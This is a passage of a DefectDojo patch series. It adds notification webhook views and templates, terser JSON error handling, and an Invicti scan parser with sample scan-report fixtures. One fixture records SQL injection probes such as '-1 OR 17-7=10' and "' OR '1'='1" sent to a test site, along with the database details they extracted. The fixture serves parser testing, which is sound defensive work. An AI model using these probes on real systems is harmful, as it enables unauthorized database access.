+    def post(self, request: HttpRequest, nwhid: int):
+        # Run common checks
+        super().preprocess_request(request)
+        nwh = self.get_notification_webhook(nwhid)
+        # Set up the initial context
+        context = self.get_initial_context(request, nwh)
+        # Determine the validity of the form
+        request, success = self.process_form(request, nwh, context)
+        if success:
+            return HttpResponseRedirect(reverse("notification_webhooks"))
+        # Add any breadcrumbs
+        request = self.set_breadcrumbs(request)
+        # Render the page
+        return render(request, self.template, context)
+
+
+class DeleteNotificationWebhooksView(NotificationWebhooksView):
+    template = "dojo/delete_notification_webhook.html"
+    permission = "dojo.delete_notification_webhooks"
+    # TODO: this could be better: @user_is_authorized(Finding, Permissions.Finding_Delete, 'fid')
+    breadcrumb = "Delete Notification Webhook"
+
+    def get_notification_webhook(self, nwhid: int):
+        return get_object_or_404(Notification_Webhooks, id=nwhid)
+
+    # TODO: Disable Owner if not superadmin
+
+    def get_form(
+        self,
+        request: HttpRequest,
+        **kwargs: dict,
+    ) -> DeleteNotificationsWebhookForm:
+        if request.method == "POST":
+            return DeleteNotificationsWebhookForm(request.POST, **kwargs)
+        else:
+            return DeleteNotificationsWebhookForm(**kwargs)
+
+    def get_initial_context(self, request: HttpRequest, nwh: Notification_Webhooks):
+        return {
+            "form": self.get_form(request, instance=nwh),
+            "nwh": nwh,
+        }
+
+    def process_form(self, request: HttpRequest, nwh: Notification_Webhooks, context: dict):
+        form = context["form"]
+        if form.is_valid():
+            nwh.delete()
+            messages.add_message(
+                request,
+                messages.SUCCESS,
+                _("Notification Webhook deleted successfully."),
+                extra_tags="alert-success",
+            )
+            return request, True
+        return request, False
+
+    def get(self, request: HttpRequest, nwhid: int):
+        # Run common checks
+        super().preprocess_request(request)
+        nwh = self.get_notification_webhook(nwhid)
+        # Set up the initial context
+        context = self.get_initial_context(request, nwh)
+        # Add any breadcrumbs
+        request = self.set_breadcrumbs(request)
+        # Render the page
+        return render(request, self.template, context)
+
+    def post(self, request: HttpRequest, nwhid: int):
+        # Run common checks
+        super().preprocess_request(request)
+        nwh = self.get_notification_webhook(nwhid)
+        # Set up the initial context
+        context = self.get_initial_context(request, nwh)
+        # Determine the validity of the form
+        request, success = self.process_form(request, nwh, context)
+        if success:
+            return HttpResponseRedirect(reverse("notification_webhooks"))
+        # Add any breadcrumbs
+        request = self.set_breadcrumbs(request)
+        # Render the page
+        return render(request, self.template, context)
diff --git a/dojo/product/signals.py b/dojo/product/signals.py
index 6871f5490d2..72e9771e82c 100644
--- a/dojo/product/signals.py
+++ b/dojo/product/signals.py
@@ -16,7 +16,9 @@ def product_post_save(sender, instance, created, **kwargs):
         create_notification(event="product_added", title=instance.name,
                             product=instance,
-                            url=reverse("view_product", args=(instance.id,)))
+                            url=reverse("view_product", args=(instance.id,)),
+                            url_api=reverse("product-detail", args=(instance.id,)),
+                            )
 
 
 @receiver(post_delete, sender=Product)
diff --git a/dojo/product_type/signals.py b/dojo/product_type/signals.py
index dde3ff502cd..743995768eb 100644
--- a/dojo/product_type/signals.py
+++ b/dojo/product_type/signals.py
@@ -16,7 +16,9 @@ def product_type_post_save(sender, instance, created, **kwargs):
         create_notification(event="product_type_added", title=instance.name,
                             product_type=instance,
-                            url=reverse("view_product_type", args=(instance.id,)))
+                            url=reverse("view_product_type", args=(instance.id,)),
+                            url_api=reverse("product_type-detail", args=(instance.id,)),
+                            )
 
 
 @receiver(post_delete, sender=Product_Type)
diff --git a/dojo/settings/.settings.dist.py.sha256sum b/dojo/settings/.settings.dist.py.sha256sum
index 878a104af54..4686d63afe2 100644
--- a/dojo/settings/.settings.dist.py.sha256sum
+++ b/dojo/settings/.settings.dist.py.sha256sum
@@ -1 +1 @@
-5adedc433a342d675492b86dc18786f72e167115f9718a397dc9b91c5fdc9c94
+8cd4668bdc4dec192dd5bd3fd767b87a4f6d5441ae8d4a001d2ba61c452e59aa
diff --git a/dojo/settings/settings.dist.py b/dojo/settings/settings.dist.py
index ebf0283dd6a..3a01d935431 100644
--- a/dojo/settings/settings.dist.py
+++ b/dojo/settings/settings.dist.py
@@ -1142,6 +1142,10 @@ def saml2_attrib_map_format(dict):
         "task": "dojo.risk_acceptance.helper.expiration_handler",
         "schedule": crontab(minute=0, hour="*/3"),  # every 3 hours
     },
+    "notification_webhook_status_cleanup": {
+        "task": "dojo.notifications.helper.webhook_status_cleanup",
+        "schedule": timedelta(minutes=1),
+    },
     # 'jira_status_reconciliation': {
     #     'task': 'dojo.tasks.jira_status_reconciliation_task',
     #     'schedule': timedelta(hours=12),
@@ -1152,7 +1156,6 @@ def saml2_attrib_map_format(dict):
     #     'schedule': timedelta(hours=12)
     # },
-
 }
 
 # ------------------------------------
diff --git a/dojo/templates/base.html b/dojo/templates/base.html
index 765ec10dc55..722656ae6a9 100644
--- a/dojo/templates/base.html
+++ b/dojo/templates/base.html
@@ -541,6 +541,13 @@
                             {% trans "Notifications" %}
+                    {% if system_settings.enable_webhooks_notifications and "dojo.view_notification_webhooks"|has_configuration_permission:request %}
+
  • + + {% trans "Notification Webhooks" %} + +
  • + {% endif %}
  • {% trans "Regulations" %} diff --git a/dojo/templates/dojo/add_notification_webhook.html b/dojo/templates/dojo/add_notification_webhook.html new file mode 100644 index 00000000000..12056373af4 --- /dev/null +++ b/dojo/templates/dojo/add_notification_webhook.html @@ -0,0 +1,13 @@ +{% extends "base.html" %} +{% block content %} + {{ block.super }} +

    Add a new Notification Webhook

    +
    {% csrf_token %} + {% include "dojo/form_fields.html" with form=form %} +
    +
    + +
    +
    +
    +{% endblock %} diff --git a/dojo/templates/dojo/delete_notification_webhook.html b/dojo/templates/dojo/delete_notification_webhook.html new file mode 100644 index 00000000000..f196ad94fc9 --- /dev/null +++ b/dojo/templates/dojo/delete_notification_webhook.html @@ -0,0 +1,12 @@ +{% extends "base.html" %} +{% block content %} +

    Delete Notification Webhook

    +
    {% csrf_token %} + {% include "dojo/form_fields.html" with form=form %} +
    +
    + +
    +
    +
    +{% endblock %} diff --git a/dojo/templates/dojo/edit_notification_webhook.html b/dojo/templates/dojo/edit_notification_webhook.html new file mode 100644 index 00000000000..94bd56c2307 --- /dev/null +++ b/dojo/templates/dojo/edit_notification_webhook.html @@ -0,0 +1,15 @@ +{% extends "base.html" %} + {% block content %} + {{ block.super }} +

    Edit Notification Webhook

    +
    {% csrf_token %} + {% include "dojo/form_fields.html" with form=form %} +
    +
    + + +
    +
    +
    + {% endblock %} + \ No newline at end of file diff --git a/dojo/templates/dojo/notifications.html b/dojo/templates/dojo/notifications.html index 52d87393c45..81fac49d5cc 100644 --- a/dojo/templates/dojo/notifications.html +++ b/dojo/templates/dojo/notifications.html @@ -89,6 +89,9 @@

    {% if 'mail' in enabled_notifications %} {% trans "Mail" %} {% endif %} + {% if 'webhooks' in enabled_notifications %} + {% trans "Webhooks" %} + {% endif %} {% trans "Alert" %} diff --git a/dojo/templates/dojo/system_settings.html b/dojo/templates/dojo/system_settings.html index 693abe712f0..02510452e16 100644 --- a/dojo/templates/dojo/system_settings.html +++ b/dojo/templates/dojo/system_settings.html @@ -62,7 +62,7 @@

    System Settings

    } $(function () { - $.each(['slack','msteams','mail', 'grade'], function (index, value) { + $.each(['slack','msteams','mail','webhooks','grade'], function (index, value) { updatenotificationsgroup(value); $('#id_enable_' + value + '_notifications').change(function() { updatenotificationsgroup(value)}); }); diff --git a/dojo/templates/dojo/view_notification_webhooks.html b/dojo/templates/dojo/view_notification_webhooks.html new file mode 100644 index 00000000000..6b02c0888d3 --- /dev/null +++ b/dojo/templates/dojo/view_notification_webhooks.html @@ -0,0 +1,101 @@ +{% extends "base.html" %} +{% load navigation_tags %} +{% load display_tags %} +{% load i18n %} +{% load authorization_tags %} +{% block content %} + {{ block.super }} +
    +{% endblock %} +{% block postscript %} + {{ block.super }} + {% include "dojo/filter_js_snippet.html" %} +{% endblock %} diff --git a/dojo/templates/dojo/view_product_details.html b/dojo/templates/dojo/view_product_details.html index 30dd863fc3c..076215121f5 100644 --- a/dojo/templates/dojo/view_product_details.html +++ b/dojo/templates/dojo/view_product_details.html @@ -668,7 +668,7 @@

    Edit Custom Fields

  • - -
  • - - Add Scan API Configuration - -
  • + {% endif %} + + {% if prod|has_object_permission:"Product_API_Scan_Configuration_Edit" %}
  • - - View Scan API Configurations - + + Add Scan API Configuration +
  • {% endif %} +
  • + + View Scan API Configurations + +
  • {% if system_settings.enable_product_tracking_files %} {% if prod|has_object_permission:"Product_Tracking_Files_Add" %} diff --git a/dojo/templates/dojo/view_product_details.html b/dojo/templates/dojo/view_product_details.html index 30dd863fc3c..0005dc3fbbc 100644 --- a/dojo/templates/dojo/view_product_details.html +++ b/dojo/templates/dojo/view_product_details.html @@ -41,19 +41,21 @@

    {% trans "Description" %}

    {% trans "Edit Custom Fields" %} - -
  • - - {% trans "Add API Scan Configuration" %} - -
  • + {% endif %} + + {% if prod|has_object_permission:"Product_API_Scan_Configuration_Add" %}
  • - - {% trans "View API Scan Configurations" %} - + + {% trans "Add API Scan Configuration" %} +
  • {% endif %} +
  • + + {% trans "View API Scan Configurations" %} + +
  • {% if system_settings.enable_product_tracking_files %} {% if prod|has_object_permission:"Product_Tracking_Files_Add" %} From 885029c7ccc1fc8225412caf45bc7136a4d5da11 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Sun, 15 Sep 2024 20:31:47 -0500 Subject: [PATCH 10/62] JSON Parsing Errors: Make errors less verbose (#10891) * JSON Parsing Errors: Make errors less verbose * Only intercept when JSON is invalid --- dojo/api_v2/exception_handler.py | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/dojo/api_v2/exception_handler.py b/dojo/api_v2/exception_handler.py index 513c98004b7..8f395026b03 100644 --- a/dojo/api_v2/exception_handler.py +++ b/dojo/api_v2/exception_handler.py @@ -2,6 +2,7 @@ from django.core.exceptions import ValidationError from django.db.models.deletion import RestrictedError +from rest_framework.exceptions import ParseError from rest_framework.response import Response from rest_framework.status import ( HTTP_400_BAD_REQUEST, @@ -20,7 +21,11 @@ def custom_exception_handler(exc, context): # to get the standard error response. response = exception_handler(exc, context) - if isinstance(exc, RestrictedError): + if isinstance(exc, ParseError) and "JSON parse error" in str(exc): + response = Response() + response.status_code = HTTP_400_BAD_REQUEST + response.data = {"message": "JSON request content is malformed"} + elif isinstance(exc, RestrictedError): # An object cannot be deleted because it has dependent objects. response = Response() response.status_code = HTTP_409_CONFLICT From 5d2e728fd49843ce79d78d058faf72a5394f37e4 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Sun, 15 Sep 2024 20:32:41 -0500 Subject: [PATCH 11/62] Add support for Invicti parser through Netsparker (#10894) * Add support for Invicti parser through Netsparker * update settings sha * Rename unit test files * Update docs/content/en/integrations/parsers/file/netsparker.md Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --------- Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --- .../en/integrations/parsers/file/invicti.md | 9 + .../integrations/parsers/file/netsparker.md | 3 + dojo/settings/.settings.dist.py.sha256sum | 2 +- dojo/settings/settings.dist.py | 2 + dojo/tools/invicti/__init__.py | 0 dojo/tools/invicti/parser.py | 20 + .../scans/invicti/invicti_many_findings.json | 4681 +++++++++++++++++ .../scans/invicti/invicti_one_finding.json | 85 + .../scans/invicti/invicti_zero_finding.json | 10 + unittests/scans/invicti/issue_10311.json | 173 + unittests/scans/invicti/issue_9816.json | 173 + unittests/tools/test_invicti_parser.py | 98 + 12 files changed, 5255 insertions(+), 1 deletion(-) create mode 100644 docs/content/en/integrations/parsers/file/invicti.md create mode 100644 dojo/tools/invicti/__init__.py create mode 100644 dojo/tools/invicti/parser.py create mode 100644 unittests/scans/invicti/invicti_many_findings.json create mode 100644 unittests/scans/invicti/invicti_one_finding.json create mode 100644 unittests/scans/invicti/invicti_zero_finding.json create mode 100644 unittests/scans/invicti/issue_10311.json create mode 100644 unittests/scans/invicti/issue_9816.json create mode 100644 unittests/tools/test_invicti_parser.py diff --git a/docs/content/en/integrations/parsers/file/invicti.md b/docs/content/en/integrations/parsers/file/invicti.md new file mode 100644 index 00000000000..c0ffda1a48e --- /dev/null +++ 
b/docs/content/en/integrations/parsers/file/invicti.md
@@ -0,0 +1,9 @@
+---
+title: "Invicti"
+toc_hide: true
+---
+Vulnerabilities List - JSON report
+
+### Sample Scan Data
+
+Sample Invicti scans can be found [here](https://github.com/DefectDojo/django-DefectDojo/tree/master/unittests/scans/invicti).
diff --git a/docs/content/en/integrations/parsers/file/netsparker.md b/docs/content/en/integrations/parsers/file/netsparker.md
index 7e46af07b12..0be436e185b 100644
--- a/docs/content/en/integrations/parsers/file/netsparker.md
+++ b/docs/content/en/integrations/parsers/file/netsparker.md
@@ -4,5 +4,8 @@ toc_hide: true
 ---
 Vulnerabilities List - JSON report
 
+[Netsparker has now become Invicti](https://www.invicti.com/blog/news/netsparker-is-now-invicti-signaling-a-new-era-for-modern-appsec/). Please plan to migrate automation scripts to use the [Invicti Scan](../invicti.md).
+
 ### Sample Scan Data
+
 Sample Netsparker scans can be found [here](https://github.com/DefectDojo/django-DefectDojo/tree/master/unittests/scans/netsparker).
\ No newline at end of file
diff --git a/dojo/settings/.settings.dist.py.sha256sum b/dojo/settings/.settings.dist.py.sha256sum
index 878a104af54..b6e48ee437c 100644
--- a/dojo/settings/.settings.dist.py.sha256sum
+++ b/dojo/settings/.settings.dist.py.sha256sum
@@ -1 +1 @@
-5adedc433a342d675492b86dc18786f72e167115f9718a397dc9b91c5fdc9c94
+1a74292fc58b2bd05c763c8c126b0b35888e2a6f8ef9ab2588bb6c8589987c9c
diff --git a/dojo/settings/settings.dist.py b/dojo/settings/settings.dist.py
index ebf0283dd6a..41f0631fa43 100644
--- a/dojo/settings/settings.dist.py
+++ b/dojo/settings/settings.dist.py
@@ -1279,6 +1279,7 @@ def saml2_attrib_map_format(dict):
     "AppCheck Web Application Scanner": ["title", "severity"],
     "Legitify Scan": ["title", "endpoints", "severity"],
     "ThreatComposer Scan": ["title", "description"],
+    "Invicti Scan": ["title", "description", "severity"],
 }
 
 # Override the hardcoded settings here via the env var
@@ -1503,6 +1504,7 @@ def saml2_attrib_map_format(dict):
     "AppCheck Web Application Scanner": DEDUPE_ALGO_HASH_CODE,
     "Legitify Scan": DEDUPE_ALGO_HASH_CODE,
     "ThreatComposer Scan": DEDUPE_ALGO_UNIQUE_ID_FROM_TOOL_OR_HASH_CODE,
+    "Invicti Scan": DEDUPE_ALGO_HASH_CODE,
 }
 
 # Override the hardcoded settings here via the env var
diff --git a/dojo/tools/invicti/__init__.py b/dojo/tools/invicti/__init__.py
new file mode 100644
index 00000000000..e69de29bb2d
diff --git a/dojo/tools/invicti/parser.py b/dojo/tools/invicti/parser.py
new file mode 100644
index 00000000000..93854d9a2dd
--- /dev/null
+++ b/dojo/tools/invicti/parser.py
@@ -0,0 +1,20 @@
+from dojo.tools.netsparker.parser import NetsparkerParser
+
+
+class InvictiParser(NetsparkerParser):
+    def get_scan_types(self):
+        return ["Invicti Scan"]
+
+    def get_label_for_scan_types(self, scan_type):
+        return "Invicti Scan"
+
+    def get_description_for_scan_types(self, scan_type):
+        return "Invicti JSON format."
+
+    def get_findings(self, filename, test):
+        """Extend the Netsparker parser, since Invicti is a renamed version of Netsparker.
+
+        If the two report formats deviate from each other in the future, this
+        method can be given its own implementation at that point.
+        """
+        return super().get_findings(filename, test)
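Because the parser is a thin subclass, exercising it looks exactly like the existing Netsparker tests; a minimal sketch (the fixture path points at the sample files added below, and running it requires a configured Django/DefectDojo environment):

    from dojo.models import Test
    from dojo.tools.invicti.parser import InvictiParser

    def parse_invicti_report(path="unittests/scans/invicti/invicti_many_findings.json"):
        # The parser reads the JSON report and returns Finding objects,
        # deduplicated downstream via the hash-code settings added above.
        with open(path, encoding="utf-8") as report:
            findings = InvictiParser().get_findings(report, Test())
        for finding in findings:
            print(finding.title, finding.severity)
        return findings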
+ """ + return super().get_findings(filename, test) diff --git a/unittests/scans/invicti/invicti_many_findings.json b/unittests/scans/invicti/invicti_many_findings.json new file mode 100644 index 00000000000..c1a1bef7786 --- /dev/null +++ b/unittests/scans/invicti/invicti_many_findings.json @@ -0,0 +1,4681 @@ +{ + "Generated": "25/06/2021 10:00 AM", + "Target": { + "Duration": "00:12:24.8161163", + "Initiated": "25/06/2021 01:46 AM", + "ScanId": "ee9136920f6243486d12ad5104e2f745", + "Url": "http://php.testsparker.com/" + }, + "Vulnerabilities": [ + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "107", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.7" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.5" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.5" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "16", + "Hipaa": "", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": true, + "Description": "

Netsparker Enterprise identified a cookie not marked as HTTPOnly.\n\nHTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.
    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "PHPSESSID" + }, + { + "Name": "Cookie Source", + "Value": "HTTP Header" + }, + { + "Name": "Page Type", + "Value": "Login" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET /auth/login.php HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nReferer: http://php.testsparker.com/auth/\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d; path=/\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nContent-Length: 3061\r\nX-Powered-By: PHP/5.2.6\r\nPragma: no-cache\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nKeep-Alive: timeout=5, max=150\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:36 GMT\r\nCache-Control: no-store, must-revalidate, no-cache, post-check=0, pre-check=0\r\n\r\n\n\n\n\n\n\n\nNetsparker Test Web Site - PHP\n\n\n
[HTML body omitted: Netsparker PHP test-site login page, with the site menu, a "Login Area" form ("Enter your credentials (admin / admin123456)", Username and Password fields), a sidebar (Tags: netsparker xss web-application-security false-positive-free automated-exploitation sql-injection local/remote-file-inclusion; Inner Pages; Links) and the footer "Copyright (c) 2010 testsparker.com. All rights reserved. Design by Free CSS Templates."]
    \t\n\n\n", + "Duration": 41.4849, + "StatusCode": 200 + }, + "LookupId": "735f4503-e9eb-4b4c-4306-ad49020a4c4b", + "Impact": "
    During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Cookie Not Marked as HttpOnly", + "ProofOfConcept": "", + "RemedialActions": "
    \n
      \n
1. See the remedy for solution.
2. Consider marking all of the cookies used by the application as HTTPOnly. (After this change, JavaScript code will not be able to read cookies.)
    ", + "RemedialProcedure": "
    Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "CookieNotMarkedAsHttpOnly", + "Url": "http://php.testsparker.com/auth/login.php" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "66", + "Cvss": { + "BaseScore": { + "Severity": 4, + "Type": "Base", + "Value": "10.0" + }, + "EnvironmentalScore": { + "Severity": 4, + "Type": "Environmental", + "Value": "10.0" + }, + "TemporalScore": { + "Severity": 4, + "Type": "Temporal", + "Value": "10.0" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + "Cvss31": { + "BaseScore": { + "Severity": 4, + "Type": "Base", + "Value": "10.0" + }, + "EnvironmentalScore": { + "Severity": 4, + "Type": "Environmental", + "Value": "10.0" + }, + "TemporalScore": { + "Severity": 4, + "Type": "Temporal", + "Value": "10.0" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + "Cwe": "89", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A1", + "OwaspProactiveControls": "", + "Pci32": "6.5.1", + "Wasc": "19" + }, + "Confirmed": true, + "Description": "

Netsparker Enterprise identified a Boolean-Based SQL Injection, which occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database.\n\nThis is an extremely common vulnerability and its successful exploitation can have critical implications.\n\nNetsparker Enterprise confirmed the vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed Netsparker Enterprise to identify and confirm the SQL injection.

Proof of Exploit

Identified Database Name: sqlibench
Identified Database User: root@localhost
Identified Database Version: 5.0.51b-community-nt-log
    ", + "ExploitationSkills": "
    There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.
    ", + "ExternalReferences": "", + "ExtraInformation": [], + "FirstSeenDate": "16/06/2021 12:38 PM", + "HttpRequest": { + "Content": "GET /artist.php?id=-1%20OR%2017-7%3d10 HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php?file=Generics/index.nsp\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "id", + "Type": "Querystring", + "Value": "-1 OR 17-7=10", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nDate: Thu, 24 Jun 2021 22:51:27 GMT\r\n\r\n\n\n\n\n\n\n\nNetsparker Test Web Site - PHP\n\n\n\n
[HTML body omitted: Netsparker PHP test-site "Artist Service" page, echoing "Results: -1 OR 17-7=10" above a results table with columns ID, NAME, SURNAME and CREATION DATE, listing actor rows 2 through 200 plus injected test rows 412-420 (values such as "-1 OR 1=1", "NS1NO", "1 AND 'NS='ss", "' OR 'ns'='ns", "1 OR X='ss" and "' OR '1'='1"), followed by the sidebar (Tags; Inner Pages; Links), the notice "This website is automatically reset at every midnight (00:00 - UTC)." and the footer "Copyright (c) 2010 testsparker.com. All rights reserved. Design by Free CSS Templates."]
    \t\n\n\n", + "Duration": 180.5509, + "StatusCode": 200 + }, + "LookupId": "dbd0a5a8-18d2-471a-7b37-ad490211f0f0", + "Impact": "
Depending on the backend database, the database connection settings and the operating system, an attacker can successfully mount one or more of the following types of attacks:
• Reading, updating and deleting arbitrary data/tables from the database
• Executing commands on the underlying operating system
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 02:01 AM", + "Name": "Boolean Based SQL Injection", + "ProofOfConcept": "", + "RemedialActions": "
    \n
      \n
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use an ORM (object relational mapping); most ORM systems use only parameterized queries, and this can solve the whole SQL injection problem.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks against this resource.
    ", + "RemedialProcedure": "
    The best way to protect your code against SQL injections is using parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
    ", + "RemedyReferences": "", + "Severity": "Critical", + "State": "Revived", + "Type": "ConfirmedBooleanSqlInjection", + "Url": "http://php.testsparker.com/artist.php?id=-1%20OR%2017-7%3d10" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.18.1.3", + "Capec": "170", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "205", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "45" + }, + "Confirmed": false, + "Description": "

Netsparker Enterprise identified a version disclosure (Apache) in the target web server's HTTP response.\n\nThis information might help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + }, + { + "Name": "Extracted Version", + "Value": "2.2.8" + } + ], + "FirstSeenDate": "15/06/2021 01:44 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "fbb65b68-873e-4fff-871d-ad48024dd60f", + "Impact": "
    An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Version Disclosure (Apache)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "ApacheVersionDisclosure", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.18.1.3", + "Capec": "170", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "205", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "45" + }, + "Confirmed": false, + "Description": "

Netsparker Enterprise identified a version disclosure (PHP) in the target web server's HTTP response.\n\nThis information can help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

